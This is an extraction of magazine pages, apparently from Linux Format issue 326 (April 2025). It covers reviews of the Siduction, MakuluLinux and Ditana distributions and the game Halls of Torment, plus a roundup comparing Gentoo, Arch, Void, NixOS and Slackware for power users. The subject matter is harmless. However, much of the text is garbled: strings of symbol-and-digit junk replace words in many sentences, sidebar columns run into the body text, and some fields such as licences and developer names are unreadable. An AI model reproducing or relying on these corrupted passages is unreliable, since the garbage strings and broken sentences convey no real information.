IN BRIEF
This OS
L Siduction is based on the
testing branch of Debian.
represented a The latest version is available with
considerable 1%"1n# "+!)0*
upgrade over desktops. But after choosing the
regular Debian 0-&+/2++&+$)0*>n4"+,1"!
testing, with 1%1&120"099&+01"!,#6)+!o
support via a This is ostensibly due to issues with
manual, IRC choosing the correct keyboard
channel and layout when using Calamares.
user forum. After downloading the 3.7GB
There were ISO, code-named Shine On You
some glitches /76&*,+!ƒ#1"/1%"&+(
installing Floyd track), we booted the OS
software but &+1,1%")&3""+3&/,+*"+1o-,+
nothing too launching Calamares, you are given The Siduction desktop has shortcuts to the handy user manual and the
serious. the option to install non-free drivers #siduction IRC channel. There’s also a user forum.
and firmware. After choosing this,
we then chose our time zone and specified partitions. touted Siduction as a viable alternative for users whose
SPECS System encryption didn’t seem to be available. machines can’t be upgraded to Windows 11. The
CPU: 1GHz Once we clicked Install, setup completed in just over review also pointed out that as a rolling release, there’s
Mem: 4GB three minutes – on a par with stock Debian. During this no need to perform regular major upgrades.
HDD: 15GB time, you are treated to a slideshow of the artwork for When we checked system settings, we noted that
Builds:5@>u>< various Siduction distros over the past 10 years, with software updates are set to Manual, which surprised
lyrical code names such as Desperado and Firestarter. us. Still, upon launching Discover, we noted that 1,179
Once the desktop loaded, we were happy to see updates were available, which may explain why the
that it contained a link to Siduction’s comprehensive system is configured not to apply them automatically.
manual. It was here we learned the recommended We also used Discover to try to install the
specs (see left). After firing up System Monitor, we cyberpunk point-and-click adventure Beneath a Steel
found the manual had got it right. With no other apps Sky. However, when we did so, the progress bar
open, Siduction used just 1.8GB of RAM in our virtual seemed frozen. The same thing happened when we
* %&+"+!/,2+!=8,#,2/3&/12)o 10&+01)) attempted to install the Chromium browser. Rebooting
footprint (including non-free packages) was 14.4GB. our virtual machine fixed this issue.
The default wallpaper is a variant of Nexus by We noted another glitch when launching Konsole.
/601&+'!")n4&1%%/&01*01%"*"ƒ+,1"1%" After attempting to use sudo apt to install cowsay,
+1%111%",11,*v/&$%1„o,2 + %+$"1,1%" we were told that the user account we created was
standard Nexus background via desktop settings. not in the sudoers file. Fixing it by switching to the
The bundled applications in our version contained a root account via su is simple for experienced Linux
+2*"/,#--0)&("Konqueror. The Konversation users, but Windows refugees could struggle.
IRC client also comes pre-installed. Clicking the IRC
shortcut on the desktop launches Konversation, which
is preconfigured to load the #siduction channel. It was
VERDICT
here that one of the Siduction developers informed us DEVELOPER: Siduction Development Team
that the OS also has an extensive user forum. WEB: https://siduction.org
They also mentioned that they’re particularly proud LICENCE:&+)6 
of including Mesa-git in this edition, an experimental
build of Mesa. The live ISO also contains chroot-helper. FEATURES 8/10 EASE OF USE 7/10
In the words of Siduction developer ‘dpanter’, this is for PERFORMANCE 8/10 DOCUMENTATION 9/10
when “things bork completely”. More technically, it
enables users to chroot into an existing install to fix Siduction offers a simple setup, as well as comprehensive
booting errors. This came in useful in 2023 when support. The desktop is stunning but there are minor bugs.
"/1&+ - ($"0!&!+}12-$/!" ,//" 1)6o
On the subject of upgrades, after visiting the user Rating 8/10
#,/2*0n4"+,1"!)&+(1,"1/"3&"4n4%& %

www.techradar.com/pro/linux April 2025 LXF326 21

REVIEWS Linux distribution

MakuluLinux 2025.1
Nate Drake heads to Vietnam to explore this feature-rich distro with its
own Electra AI assistant. What more could you want?
ince 2013, there have
IN BRIEF
‘Makulu’ means
S been various versions
of MakuluLinux,
‘big’ in Zulu and including ones based on Ubuntu
that’s what the LTS. This latest version is based
OS does. It’s big on Debian Testing and is part of
on features, AI the project’s LinDoz products.
integration, and These LinDoz editions are
pre-installed designed to make the transition
applications. from Windows to Linux easier,
Upgrade to such as by using the Microsoft-
/,#,/"11"/ like Cinnamon desktop.
desktop and AI After downloading the hefty
customisation. 6GB ISO and booting it in our
VM, we were pleased to see
that the OS supports live mode.
SPECS We were immediately treated Upgrading to Pro offers more desktop customisation, such as additional wallpapers, icons, shades
CPU: 1GHz 1,3&!",,#$6+,&!4%, and themes. It also unlocks advanced AI features.
Mem: 2GB (4GB represents the built-in Makulu
suggested) AI Electra. This provided a useful overview of the themes. We were particularly impressed by the
HDD: functions Electra can perform and how to access it. inclusion of over 30 high definition wallpapers.
15GB (20GB Upon first launch of the live desktop, we were also Next, we launched the AI assistant, which uses a
suggested) treated to a window listing Makulu’s AI tools, but we chat interface to talk with Electra. This was extremely
Builds: x86_64 launched the installer instead. We were impressed to sluggish in our VM but that’s unsurprising given that it
see that you can specify the download server. couldn’t directly access the system GPU. The drop-
Setup is managed by Calamares, so it only took a down menu at the top allows users to interact with a
few moments to go through options like setting the number of other LLMs including Claude and ChatGPT.
keyboard layout, partitions and users. We couldn’t see Makulu’s AI Toolbox contains launchers for even
an option for system encryption. Once the install was more useful utilities such as tools for image generation,
underway, setup completed in just under eight minutes. background removal and coding assistance.
When the desktop loaded, the Makulu Setup You can add more programs via the pre-installed
Manager launched automatically. This encourages Gnome Software. We used this to install the Flatpak
users to configure drivers and the system firewall, as version of Firefox without issue. This wasn’t necessary,
well as network and backup settings. After this app is because the OS comes with the Chromium browser.
closed, the First-Setup utility opens for Makulu’s own However, from going through the pre-installed apps
messaging program. This includes Makulu’s latest n4"+,1"!1%"/"4"/"0,*"/"!2+!+ &"0n02 %0
Universal Translator feature, so that each participant including both the Mpv and VLC media players.
sees chats in their native language. The Software Center supports updates, but Makulu
The main website has extensive documentation, has its own dedicated utilities for system and package
including helpful tutorial videos from lead developer updates. These can be launched from the dock.
Jacque Raymer. However the listed system specs were
for an older build of Makulu. Fortunately, the desktop
implements Conky, which lists current resources. With
VERDICT
no other apps running, the system used 1.5GB of RAM DEVELOPER: Jacque Montague Raymer
on our VM and around 1% of our virtual CPU. Despite WEB: www.makululinux.com
the large ISO, the install footprint was around 20GB. LICENCE: GPL v3
At this point, we received a message from Jacque
Raymer himself. After discovering his OS was being FEATURES 10/10 EASE OF USE 9/10
reviewed, he sent us a DEB file to upgrade to the Pro PERFORMANCE 9/10 DOCUMENTATION 9/10
edition. This normally costs $33 and includes a number
of upgrades, including extra desktop customisation, as We don’t say “wow” very often but MakuluLinux is truly
well as an AI widget and better integration. impressive. The desktop is colourful, intuitive and featureful.
Upon rebooting, we decided to fire up the upgraded
desktop manager. This offers options to relocate the Rating 9/10
dock and panels, as well as apply new colours and

22 LXF326 April 2025 www.linuxformat.com

 Linux distribution REVIEWS

Ditana 0.9.0
Nate Drake delves into the beta version of this Arch-based distro.
Is it ready to roll or just played out?
itana’s main site contains a
IN BRIEF
This distro
D Design Philosophy section
that states: “We believe
performs well that users should have the power
for a beta and 1,*("4"))v&+#,/*"!!" &0&,+0
has some about their systems’ requirements
excellent without unnecessary complexity or
#"12/"0o"12- hidden defaults.”
is flexible but %"&10")#&00"!,+/ %
the huge Linux and is currently only available
number of as beta software. While LXF as a
options might rule doesn’t review development
overwhelm versions of Linux distros, there’s
non-power been enough online buzz to
users. We’d convince us that this one is
)0,--/" &1" sufficiently mature to be tested.
more in-depth After downloading and booting While power users might appreciate the chance to enter their monitor DPI, it strikes us as
documentation. 1%"9o>  n4"+,1"!1%"0601"* overkill to require this during setup.
uses a colourful text-based installer.
We were also given the option for robotic speech. replacing text in files and running searches. We
SPECS The setup options were reasonably intuitive at encourage you to do your own research.
CPU: 1GHz #&/01o0-/,*&0"!61%"!"3"),-"/0n20"/0%3" The Xfce desktop also has a built-in cheat sheet,
Mem: 2GB $/"1!"),# ,+1/,),3"/1%"-/, "00n04"4"/" which lists handy keyboard shortcuts and commands.
HDD: 13GB offered the option for a headless install, as well as These are listed by category, such as Workspaces
Builds:5@>u>< specific packages. Users can even configure the +!,#14/"+$"/o%&0&04%"/"4")"/+"!1%1
("/+"),/!&0)"+"14,/(&+$!2/&+$0"12-o Ditana uses Pikaur as an AUR helper, which in turn
This said, the setup assistant wasn’t as intuitive forwards to Pacman for official packages.
04"}!%,-"!o,2/"-/,*-1"!1,0"120"/+! We were able to use this in the Kitty terminal to
group ID (1000 is left in by default). The installer also search for packages. However, installation and updates
prompts you to choose a keyboard layout and locale. are managed by Pacui. This uses a numerical menu. For
After choosing GB, unknown to us, it defaulted to the instance, you can press 3 to view an alphabetical list of
Colemak layout, which resulted in a comedy of errors installable AUR packages. You can scroll through these
4%"+"+1"/&+$1%"),$&+-004,/!o1&))n&1+1("0 manually but Pacui also allows you to enter a string to
security seriously, as you must choose passphrases of filter the list, as we did to install Firefox.
at least eight characters, with a mixture of letters and The desktop interface itself is colourful but not as
+2*"/0o601"*"+ /6-1&,+&0)0,02--,/1"!o intuitive as we’d like. The application launcher in the
Once the setup process began, it downloaded a corner isn’t helpfully labelled as such, so we had to find
large number of packages, meaning it took over 20 it on our own. The icons at the bottom-right were also a
minutes for installation to complete. This makes the little too closely grouped together, but we noticed that
distro one of the longest we’ve ever taken to set up. this wasn’t the case at higher monitor resolutions.
After reviewing the online documentation, we
couldn’t find any record of the system requirements
1,/2+&1+o%,0",21)&+"!(see side box) are for
VERDICT
&10-/"+1n/ %o1&))n2-,+#&/01),$&+n4"4"/" DEVELOPER:1"#++!%,*0&--/,1%
pleased to see that Gnome System Monitor comes WEB: https://ditana.org
pre-installed. This showed that without any other LICENCE:&+)6 
--)& 1&,+0/2++&+$n1%"20"!,+)6/,2+!: 
,#+!/,2+!@,#,2/3&/12)/"0,2/ "0o FEATURES 7/10 EASE OF USE 6/10
The install footprint was quite light at around PERFORMANCE 7/10 DOCUMENTATION 7/10
10.4GB. This was no doubt due to the fact that we
,+)6 %,0"1%"!"#2)1- ($"0!2/&+$0"12-o%&0 Ditana is extremely flexible and has AI integration. However,
excluded Ditana’s integrated AI assistant, as we knew setup is laborious and there’s no graphical package manager.
,2/0&*-)6 ,2)!+}1%+!)"&1o%10&!n1%",+)&+"
documentation states that Ditana Assistant is useful Rating 7/10
for routine operations such as identifying processes,

www.techradar.com/pro/linux April 2025 LXF326 23

REVIEWS Action RPG

Halls of Torment
Management loves the idea of a vast army hammering away
at keys all day – Joshua Wolens thinks that’s his current day job.
he most obvious difference between Halls of you’re going to spec your guy over a multitude of +1%
SPECS
Minimum
T Torment and its inspiration is that it expects you
to click to attack. No, sir, none of that Vampire
and +0.2% increments to their myriad stats. And where
ordinarily those kinds of minute increases are barely
OS: Ubuntu Survivors laxity here. You’ll make inputs to hit enemies noticeable in RPGs, the constant churn of level-ups
18.04 LTS and you’ll like it. At least for the 10 seconds or so before means they quickly accrue into meaningful differences.
CPU: 2.5GHz+, you head into the settings menu and turn it off.
quad-core But there’s a reason Halls of Torment starts like that: Weapons of mass construction
Mem: 4GB it’s a mission statement. Yes, it’s saying, you’re one little Plus, your buildcrafting is made easier by one of Halls of
HDD: 4GB guy against an army of hundreds, thousands, hundreds Torment’s primary cleavages from Vampire Survivors:
GPU: Intel Iris of thousands of other little guys, and yes, you’re sucking level-ups only give you a chance to buff stats, not choose
Xe, Nvidia GTX up experience gems by the bucketload, but this isn’t that new weapons, and you get four options to choose from
970, AMD RX other autobattler. This is something different, more (with opportunities to reroll your options, once you get in
570, Mesa 22+ deliberate, more considered, and altogether less slot- far enough). If you want new gear, actual gear, you have
machiney than its razzle-dazzle forebear. This is Vampire to slay one of the bosses roaming the levels, but it’s not
Recommended Survivors with a heavy Diablo gloss. It’s exactly as strictly necessary. Filling all your possible weapon slots
OS: Ubuntu dangerous for your time and productivity as it sounds. &0//&16n+!&14,2)!+}1"2+%"/!,#1,*("&1))1%"
22.04 LTS We’re not name-dropping Halls of Torment’s clearest way though a level without ever getting anything on top
CPU: 3.5GHz+, influences to demean it. The game doesn’t shy away of your default, class-based weapon.
quad-core from its inspirations – they’re there on its sleeve for all Take our favourite class and probable war criminal:
Mem: 8GB 1,0""x21&14,2)!"2+#&/+!&+ 2/1"1, ))Halls the Exterminator. He’s got a flamethrower. Notionally, you
HDD: 4GB of Torment derivative. By some mad alchemy, it blends could have other weapons, but who cares? Our focus
GPU: Nvidia the compulsive loops and endless enemies of Vampire when playing him is turning him into a roving, angry
GTX 1070, Survivors with the gear and buildcrafting of Diablo and Roman candle, melting hordes of enemies into masses
AMD RX 570 produces something wholly its own. of undifferentiated flesh. Is this optimal? Perhaps not. Is
Despite the writhing masses of sprites, it’s a this satisfying? Like you wouldn’t believe.
)&11)"*,/"1%,2$%1#2)+! ,+0"/31&3"1%+,1%"/ That’s the handle: the thing that makes Halls of
autobattlers we’ve played. Your hero has over 20 stats Torment different from Vampire Survivors and the thing
for you to consider as you massacre your way through that makes us keep coming back to it is that it feels like
dungeons. There’s the usual stuff – health, defence, you’re following something resembling a plan. Vampire
damage – but there’s also stuff like piercing, force and a Survivors is great, but its experience is one of frantically
critical hit system composed of multiple substats. assembling an ad-hoc toolkit out of whatever its level-up
Rounds are 30 minutes, so you’re unlikely to max gachas spit at you. Failure is a quirk of the slot machine.
them all out even if you want to. You have to decide how In Halls of Torment? Our failure is the failure of our plan
Failure is a quirk of
the slot machine. CREDIT: Chasing Carrots

24 LXF326 April 2025 www.linuxformat.com

 Action RPG REVIEWS

Things might be
getting out of hand…

The Exterminator The Exterminator fires his

attacks enemies with flamethrowers at many
lighting in the Caverns. enemies in the ice level.

or our ability to adhere to it [steady on now! – ed]. There’s

an element of luck, but only an element.
VERDICT
Plus, Halls of Torment’s specific aesthetic couldn’t DEVELOPER: Chasing Carrots
"*,/"112+"!1,,2/0"+0&&)&1&"00 %&)!,#1%" WEB: www.chasing-carrots.com
ARPGs of the late ’90s and early 2000s. Give us two PRICE: £5.49
honking great orbs representing health and mana, and
-/,1$,+&014%,%0+,/1& 2)1&+$',&+10&+%&0)"$0n GAMEPLAY 9/10 LONGEVITY 8/10
and we’re a happy person, and Halls of Torment makes GRAPHICS 8/10 VALUE 9/10
us very happy indeed with its lo-fi heroics and diffuse,
Stygian levels. If we could play this thing on a beige Halls of Torment assembles the Frankenstein parts of Diablo
4%&)",,*&"0 /"*"!&+,2/"/0n4" and Vampire Survivors into something brilliantly all its own.
wouldn’t know it wasn’t 1999. Actually, wait, we can
!,1%1o #+6,+"+""!020n1"))1%"*4"}/"206#,/ Rating 9/10
1%"#,/"0"")"#212/"o

www.techradar.com/pro/linux April 2025 LXF326 25

WE COMPARE TONS OF STUFF SO YOU DON’T HAVE TO!

Michael Reed
has been using
Linux since the
Gentoo Arch Linux Void Linux mid ’90s, so a bit
NixOS Slackware of compiling and
reconfiguring
doesn’t faze him.

Power-user distributions
Michael Reed tries some Linux distros that throw ease of installation out
of the window in favour of customisation and a learning experience.

HOW WE TESTED…

Naturally, we installed each

distribution by following the
associated installation guides.
Each time round, we chose
moderate, mainstream options
to build what we considered to
be a general-purpose desktop
system with Xfce as the front-
end. This was opposed to a
stripped-down headless
server or an embedded-type
system. While installing, we
chose the modern GPT
partitioning and boot system
over the legacy MBR system.
We followed the
recommended guidelines
+!,,1"!#/,*1%",##& &)
live media, even if it is possible
to install from within a
different distribution. This is
+--/, %4"/" ,**"+! inux has come a long way over the the usual installation tools do on a typical
because it gives you a chance
to become familiar with the
L years, and it’s now possible for a
beginner to install it themselves
Linux distribution.
With these distros, the installation
service management thanks to distributions such as Linux Mint, 01/106-/1&1&,+&+$1%"%/!!&0(#/,*1%"
commands (and other tools) Ubuntu and Fedora. However, we’re looking command line. Next, you copy across the
at an entirely different breed of distro here. essential files of the distribution and then
CREDIT: Westend61/Getty Images

,#1%"!&01/&21&,+6,2}/"
,211,1 ()"o0+ These power-user distros are tricky to chroot into the partially installed system.
example, we set up the SSH install but provide useful benefits over the From this point, you can begin configuring
server while installing so that more run-of-the-mill options, because they the system and install the bootloader. At
we could cut and paste from are far more customisable and they give the each stage, you have some options about
our regular (Ubuntu) desktop user a deep insight into how a Linux system how you would like to proceed. Hopefully,
even though the installation actually works. In each case, you’re going to along the way, you’ll learn a few things about
was running within a have to roll your virtual sleeves up and get how a Linux distribution functions and put
VirtualBox virtual machine. stuck into the command line to carry out an together a system that works just the way
installation, effectively manually doing what you want it to.

26 LXF326 April 2025 www.linuxformat.com

 Power-user distributions ROUNDUP

Installation
procedure
It tends to be a learning experience
with distributions like these.
entoo’s installation procedure is one of the most Slackware’s installation utility does a lot of the work for you, which might be what

G complex we’ve come across, and it’s largely carried out

manually with little use of helper scripts. Because it’s a
you want, but it does detract from the full manual installation experience.

source-based installation, you can end up waiting for, say, half an and partition the disks. Then on, the installation utility uses a
hour while certain packages are compiled and installed. If you text-mode GUI. The procedure isn’t that different from a modern
choose the wrong option, this obviously adds to the time. We Linux installation, with a few small extra details. One bigger
reckon that a user who understands manual partitioning and difference is that you have a lot of control of package selection.
compiling the kernel would typically need a couple of nights to NixOS starts in a familiar way as you boot from a live medium,
install the system. A less advanced user might need a week. then set up partitions from the command line. From there on,
Arch Linux installation is also a largely manual affair, but it things take a different tack as a config file is edited to make all
doesn’t involve compiling packages from source. We reckon it decisions about configuration (such as the locale) and package
might be the best balance between having full manual control selection. Thankfully, there are some good installation groups,
,#4%16,2/"&+01))&+$+!)"/+&+$%,4&+254,/(04&1% such as those to set up a Gnome desktop.
building a usable system with a reasonable amount of effort.
Void Linux is similar. Where appropriate, standard tools are VERDICT
used, but some of the install is made easier with custom scripts.
Getting out of things like manual keyboard setup is convenient GENTOO 8/10 NIXOS 7/10
without making us feel too separated from the experience. ARCH LINUX 9/10 SLACKWARE 7/10
If you’ve been with Linux since the early days, Slackware’s VOID LINUX 9/10
installation will be a trip down memory lane. Some manual work You learn a lot, but installing Gentoo is a lot of work. Arch also gives you
from the command line has to be done to install the bootloader insights into how things work.

Alternative
distro builds
Pre-built and configured options
with easy-to-use derivatives.
entoo has a small collection of alternative installation

G media, including a minimalist and a GUI version, and

AMD64 and x86 versions. There are about a dozen main
distros that use Gentoo as a base. Although a binary package Manjaro Linux is a desktop OS that uses Arch Linux as its base. It offers a variety of
repository exists for Gentoo, there is currently no official Gentoo editions with different desktop environments and an easy-to-use installer.
distribution that works without source code packages by default.
There are quite a lot of distros that use Arch Linux as a base, NixOS website offers a live CD image so you can try out NixOS
including live pen-testing distro BlackArch and the polished without having to install it first. AthenaOS is a penetration-testing
desktop OS Manjaro Linux. SteamOS still powers the Steam Deck distribution that uses Arch as a base with the Nix package
portable gaming device, even if it can’t be run on a standard PC. manager. There are some experimental efforts to create NixOS-
Void Linux has a small variety of alternative boot media that derived distributions, but none of these seems ready for day-to-
give you the option of working from a command line or GUI, or day use yet.
rootfs or musl as an alternative to glibc, but these make no
difference to the Void distribution you actually install. VERDICT
Salix, Slax, Slackel and Zenwalk are easy-to-use desktop
distros that are built on a Slackware base. Like some of the Arch- GENTOO 6/10 NIXOS 4/10
derived distros, these give you easy access to Slackware without ARCH LINUX 8/10 SLACKWARE 7/10
the difficulties of installing it and the spartan starting point. VOID LINUX 5/10
Nix is a package manager and NixOS is a low-overhead Linux- Arch Linux, Gentoo and Slackware are the base of a number of
based operating system that uses that package manager. The ŋÐÿÿƽÿìüÐÌǏÌìĬijĨìÅķijìČĆĬƧ

www.techradar.com/pro/linux April 2025 LXF326 27

ROUNDUP Power-user distributions

Following the installation guide

An important aspect Gentoo 7/10 Arch Linux 9/10
of these distros. We need a good guide for Gentoo as it’s a We feel that Arch Linux has the best
complicated installation procedure. We installation guide on balance. It helps that
ecause these are appreciate the way its guide is thorough it’s organised into sections with a sidebar

B *+2))6&+01))"!
distributions, the quality
&+&10"5-)+1&,+,#4%1" %+!"3"/6
command does, yet, ironically, it doesn’t
and has a clear-looking aesthetic that
separates command line sequences in the
,#1%"&+01))1&,+$2&!"&0,# assume much pre-existing knowledge. explanatory text. Useful boxes containing
paramount importance. We’ll start The guide does have its problems, additional tips, notes and warnings are
with the fundamentals because a though, the main one being that it follows littered throughout the guide. It says a lot
good layout is appreciated. By this, more than one installation path within a for the Arch documentation that we often
we mean clearly marked sections single document. For example, the UEFI land on it when searching for help on
that, preferably, can be jumped boot system and the traditional MBR style various Linux topics.
between. A massive wall of bland- of boot are mixed in together. The same The text is highly informative because
looking text wears thin pretty &01/2"#,/Systemd and OpenRC init &11"+!01,$&3"#2))"5-)+1&,+01,
.2& ()6&+1%&00,/1,#0&121&,+n0, systems or using a signed kernel. 4%66,2/" //6&+$,211%" 1&,+0o
4")0,)&("1,0""$,,!20",# The end result is a lot of scrolling up Alternatives (such as to the init or boot
colour and formatting. +!!,4+06,2%3"1,!,2)"v %" ( systems) are mentioned, but they don’t
We like to see a full explanation which option relates to each command take over the text, like the confusing
of what we’re typing actually does, sequence, and it doesn’t help that the Gentoo guide. Again, balance is key here:
even if we have to follow links to section headers are indistinct with a bland the text isn’t crowded with superfluous
other parts of the documentation colour scheme. Splitting it into different details, but it includes a healthy number
&+,/!"/1,!,0,o002*-1&,+,# versions for different options would have ,#)&+(01%1,##"/*,/"!"1&)4%"/"&1}0
knowledge can be a problem with a been easier to follow. It’s a shame, as you needed, and these are easy to open in
guide that is overly light on details, can learn so much from installing Gentoo. another browser tab.
because you could end up in a
situation where you’re typing in
commands and don’t have any
&!",#4%11%"6*"+o%&0
*"+01%16,2}/"-/,+"1,$"11&+$
stuck at one stage or another, and it
also means that you’re not actually
learning anything about how the
distribution works.

Educational value
These distributions offer an opportunity to pick up some useful skills.
f the systems we’ve looked at, Gentoo offers the something like Debian. The documentation is excellent and the

O *,01&+0&$%1&+1,%,4&+250601"*4,/(0n-/1&))6
because its systems are so basic and partially because
skills you’ll learn are highly transferable to other Linux systems.
Slackware’s installation routine is slightly more automated
the packages have to be compiled and configured. Package than that of the other systems, which means that you do miss
manager Portage doesn’t do as much for the user automatically out on some information about how Linux works.
as, say, apt. For example, we installed X11, but we ended up Void Linux, Slackware and Arch Linux are similar in that they
without some essential packages and couldn’t start the GUI. We present the user with a basic Linux system that is best managed
had to resort to searching online to understand the meaning of via configuration files. By contrast, it can be tricky to manually
the errors we were seeing. Being frank, once you’ve built a fully configure a component such as the init system of a distribution
working Gentoo system, the other systems we’re looking at are a like Ubuntu, as it’s more complex.
cinch, and that means we must have learned something useful
from installing Gentoo. VERDICT
Like all of the systems, you’ll learn something about how
Linux works by using NixOS. However, the downside of it being a GENTOO 9/10 NIXOS 6/10
declarative system is that some of the skills you’ll learn can’t be ARCH LINUX 8/10 SLACKWARE 6/10
transferred to a more ‘normal’ system. VOID LINUX 7/10
Although Arch Linux has its own package manager (Pacman), For better or worse, you have to learn a lot to manage Gentoo – but that does
it is a fairly standard system and works along similar lines to mean your Linux knowledge grows.

28 LXF326 April 2025 www.linuxformat.com

 Power-user distributions ROUNDUP

Void Linux 6/10 NixOS 5/10 Slackware 5/10

The Void Linux installation guide is part The NixOS installation guide is a fairly The installation guide for Slackware
,#1%"*&+!, 2*"+11&,+o%"*+2) short document that strips things right &0+}1-/1& 2)/)6),+$,/!"1&)"!o#1"/
&04"))4/&11"+,+1%"4%,)"+!1%&0 down about as far as they can go when it 1%"-/1&1&,+&+$%0""+!,+"n1%"
section is no exception, but it is a bit terse comes to detail, amounting to a set of installation of Slackware itself is carried
compared to what some of the other commands to be typed or pasted into the out using a rather old-fashioned-looking
systems offer. Although, it has to be said, terminal with some minimal explanations text-mode GUI tool. So, there isn’t much
it doesn’t strip things down to the very ),+$1%"46o cutting and pasting to be done for most
basics like the NixOS guide does. It assumes that the user already has a procedures. With a setup like this, having
Although it’s a rather lightweight rough idea of how to manually set up a a highly detailed guide isn’t as important.
$2&!"n1%"1"51&04"))-,-2)1"!4&1% Linux distribution. Don’t get us wrong, it’s Having said all this, there’s a couple
)&+(01,,1%"/0" 1&,+0,#1%",3"/)) perfectly possible that a first-timer will be ,#-/,)"*04&1%1%"!, 2*"+11&,+o
documentation. It fulfils our requirement able to get to the end of the document Some of it is out of date now, and makes
that we were able to get answers about and end up with a working system. reference to the old method of installing
what most command sequences actually However, if something goes wrong, such Slackware, which required downloading
do along with some other useful 20"/ ,2)!"+!2-012 (n4&1%02 % disk collections organised by topic, and
information when we needed it, and that’s minimal information. most users would prefer to work from
the important thing. On the other hand, The second problem with a guide of + 1%"0"!60o" ,+!)6n1%"/"}0
being lightweight stumped us in some 1%&0016)"&01%16,2}/"+,1)"/+&+$0 distinct lack of detail in the main text and
areas because, as an example, we had to much, as you may not know what these a lack of links to further information. Most
leave the guide and search around the commands are actually doing. This is users will have to use guesswork and the
internet to find out what rootfs was and particularly true when you consider that scant documentation, but finding out the
decide if that was the right type of many systems in NixOS are custom or meaning of some of the options requires
installation for our needs. less-common ones. a search of the site or the wider internet.

As a daily driver distro

Using it as a standard desktop distribution for average users.
ll of the distributions we’ve looked at can be turned into editing text files. It has the disadvantage of being a less well-

A typical desktop Linux systems by adding an unprivileged

user, a desktop environment and some desktop apps.
known distribution.
NixOS’s approach to configuration and software installation is
When evaluating Gentoo as a daily driver distribution, the first unusual as some changes involve a rebuild and reboot.
problem is that it takes quite a lot of expertise and work to get it Like Slackware, Arch has a strong community around it and
into that state. Portage is a highly robust and reliable package this means you’re more likely to find that other people have
manager, but as it’s source-based, adding a new package can 1/&"!1,&+01))4%1"3"/6,2}/"1/6&+$1,&+01))o" 20",#1%1
take a long time. Gentoo deliberately omits some automatic support, it’s the best of the five to use as a standard desktop,
systems, another barrier to making quick, easy changes. even though it doesn’t have the ease of use and convenience of
Once it’s up and running, Slackware is fairly easy to use something like Ubuntu.
4%"+&1 ,*"01,- ($"*+$"*"+1o 1}0)"00 ,**,+
format for binary packages, and some non-open source VERDICT
packages such as the one for Google Chrome have to be
manually converted before installation, and there’s a chance that GENTOO 5/10 NIXOS 5/10
some such packages can’t be used. Day-to-day configuration ARCH LINUX 7/10 SLACKWARE 6/10
means often hitting the documentation and editing text files. VOID LINUX 6/10
We’d make similar comments about Void, as it’s a difficult Overall, Arch Linux is the best match for daily driver duties, even though it’s
installation for the average user, and configuration often involves not a good recommendation for Linux newbs.

www.techradar.com/pro/linux April 2025 LXF326 29

ROUNDUP Power-user distributions

Community
and support
Getting started and
troubleshooting problems.
he official Slackware documentation revolves around a

T wiki with hundreds of articles, but frankly, it’s a mixed

bag in terms of its quality and organisation. It’s difficult
to tell how up to date some of the pages are. The Slackware Because it’s a popular distribution, Arch Linux is well supported around the internet.
forum exists as a subforum at www.linuxquestions.org, and The Reddit subreddit is an example of a good third-party resource for information.
&1}04"))3&0&1"!)1%,2$%+,13"/64")),/$+&0"!o%&01%"*"
continues through most of the support resources for Slackware, forum, the Matrix chat and social media, along with third-party
which are often disordered and out of date. sites such as Discord and Reddit. All of these have a decent
Arch Linux is quite a popular Linux distribution and this is amount of activity for a less well-known distribution.
reflected in the search results around the web when you’re Void isn’t as well known as some of the other options. There is
troubleshooting. Sites such as Reddit have a lot of activity an official forum, but it’s not very busy, and the Reddit subreddit
concerning Arch Linux discussion. The official documentation is probably a better option. The Void Handbook is well organised
feels like a huge, well-organised manual, and it’s obviously well and accessible from within the distribution.
maintained. The official forum is well visited and well organised.
Arch has a large community and the resources are there when VERDICT
you need to do something or troubleshoot.
Gentoo is also quite a popular distribution. Although its official GENTOO 7/10 NIXOS 6/10
forum doesn’t have quite as much activity as that of the Arch ARCH LINUX 9/10 SLACKWARE 6/10
one, it looks as though questions are being answered. VOID LINUX 5/10
NixOS and its package manager Nix have a well-organised Arch’s large community does it favours when it comes to support. Gentoo is
community support page with links to the official Discourse well supported by third parties, too.

Scope for
customisation
Make your vision for a Linux system
a reality rather than using defaults.
ixOS is the odd one out as it’s declarative. Rather than

N building a working system, then adding to it, you create a

specification for the system in a configuration file. This NixOS uses a flat text file to specify configuration. Initially, it has sensible defaults,
includes all the main configuration options such as the keyboard but getting things up to the level of a typical desktop Linux system takes research.
type along with the installed packages. These specs are applied
during installation. When extra packages are added to a running first installed, less of the default decisions are made for you. Thus
system, the whole system is reconfigured and rebooted. This it’s a better customisation base than something like Ubuntu.
means you can take your config file and use it next time you Void also doesn’t work that differently from other distros but
install NixOS. It’s a fantastic system but guessing only gets you so its initial clean system is a good base for your own choices.
far. We had to search online to find some configuration options. Again, Arch is fairly conventional in terms of how it works,
Gentoo gives you a lot of control over what you install and a 210&1&+&1&))6&+01))00& 0601"*n1%"/"}0),1,#0 ,-"#,/
great deal of scope for fine-tuning because you compile the customisation. It also helps that the documentation is extensive.
packages via Gentoo’s Portage package manager. Some of the
aspects of the distro that work against it in other areas, such as VERDICT
ease of use, work in the distribution’s favour if you’re interested in
tweaking things. Gentoo uses ‘use flags’ that can be configured GENTOO 9/10 NIXOS 7/10
globally or for individual packages. An example would be that a ARCH LINUX 8/10 SLACKWARE 7/10
package can be compiled without OpenGL or CUPS support. VOID LINUX 7/10
Unlike most modern distros, Slackware allows detailed All of these distributions are open to customisation, with systems that are
package selection during installation, and as it’s more basic when designed for hand-tweaking.

30 LXF326 April 2025 www.linuxformat.com

 Power-user distributions ROUNDUP

The verdict
Power-user distributions
e’ve chosen Arch Linux as our current favourite

W power-user distro. Its installation documentation

is easy to follow yet extremely informative. Some
of its systems are specific to Arch, such as the package
manager, but on the whole, it uses standard components
that are suited to manual configuration. Putting time
&+1,&+01))&+$n ,+#&$2/&+$+!20&+$/ %*"+06,2}/"
building useful skills that can be applied to Linux distros
&+$"+"/)o 10)/$"n4"))v"01)&0%"! ,**2+&16&0)&#"v
saver if you run into problems, and this means that you’re
not going to be completely left in the lurch if you want to
install a binary package or attempt something unusual.
Gentoo is the distro for those who like to control every
aspect of what components are installed and how they 1st Arch Linux 9/10
are configured. Getting started is difficult if you’re used to
other, simpler distros. Compiling packages from source is Web: https://archlinux.org Licence: Various open source and
actually easier than on other distributions because it’s proprietary Version: Rolling release, updated 19th Jan 2025
taken care of by the Portage package manager. As a day- Lightweight and flexible. Excellent learning opportunity. Highly customisable.
to-day distro, though? Apart from all the compiling, many
